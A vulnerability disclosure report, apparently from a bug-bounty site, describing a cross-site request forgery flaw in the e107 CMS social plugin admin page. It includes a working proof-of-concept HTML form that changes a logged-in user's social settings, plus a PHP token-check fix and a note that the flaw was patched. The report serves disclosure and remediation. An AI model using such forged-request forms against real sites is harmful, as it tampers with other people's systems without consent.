Cross-Site Request Forgery (CSRF) in e107inc/e107


Reported on

Sep 13th 2021

✍️ Description

An attacker or malicious user is able to change the site's social settings if a logged-in user visits an attacker-controlled website, because the request lacks a CSRF token.

🕵️‍♂️ Proof of Concept

1. While logged in, open this POC.html in a browser and submit it; you can then check that your Facebook page setting was unintentionally changed to "".

 <script>history.pushState('', '', '/')</script>
   <!-- No CSRF token field is present: the browser attaches the victim's session cookie, and the server accepts the request as-is -->
   <form action="http://localhost:8181/ecms-full/e107_plugins/social/admin_config.php" method="POST">
     <input type="hidden" name="xurl[facebook]" value="" />
     <input type="hidden" name="xurl[twitter]" value="#" />
     <input type="hidden" name="xurl[youtube]" value="#" />
     <input type="hidden" name="xurl[linkedin]" value="" />
     <input type="hidden" name="xurl[github]" value="" />
     <input type="hidden" name="xurl[flickr]" value="" />
     <input type="hidden" name="xurl[instagram]" value="#" />
     <input type="hidden" name="xurl[pinterest]" value="#" />
     <input type="hidden" name="xurl[steam]" value="" />
     <input type="hidden" name="xurl[vimeo]" value="" />
     <input type="hidden" name="xurl[twitch]" value="" />
     <input type="hidden" name="xurl[vk]" value="" />
     <input type="hidden" name="save_social_pages" value="1" />
     <input type="submit" value="Submit request" />
   </form>

💥 Impact

This vulnerability is capable of forcing a logged-in user to unintentionally change the site's social settings.

💥 Test

Tested version is 2.3 on Firefox and Safari.

💥 Fix

You should require a CSRF token on this request and verify it server-side before saving the settings.
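One way to implement that fix, shown here as an added example in plain PHP that is not e107's own code (the function names and the csrf_token field are assumptions; e107's real token helpers may differ):

```php
<?php
// Added illustration (not e107's own code): a minimal synchronizer-token
// check for a settings handler such as social/admin_config.php.
// Function and field names are assumptions, not e107 identifiers.
session_start();

function csrf_token(): string {
    // One unguessable token per session, created on first use.
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

function csrf_check(array $post): bool {
    // A forged cross-site form cannot supply this value: the attacker's page
    // cannot read the victim's session, so the field is absent or wrong.
    $sent = $post['csrf_token'] ?? '';
    return is_string($sent)
        && isset($_SESSION['csrf_token'])
        && hash_equals($_SESSION['csrf_token'], $sent); // constant-time compare
}

if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['save_social_pages'])) {
    if (!csrf_check($_POST)) {
        http_response_code(403);
        exit('Invalid or missing CSRF token; settings not changed.');
    }
    // ... only now apply $_POST['xurl'] to the stored social settings ...
}

// When rendering the legitimate admin form, embed the token as a hidden field
// so that only forms served by this site carry the expected value.
echo '<input type="hidden" name="csrf_token" value="'
   . htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8') . '" />';
```

The PoC form in this report sends no csrf_token field, so with this check in place it is rejected with 403 before any setting is written.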


We have contacted a member of the e107inc/e107 team and are waiting to hear back 2 years ago
Cameron marked this as fixed with commit 2682ae 2 years ago
Cameron has been awarded the fix bounty
This vulnerability will not receive a CVE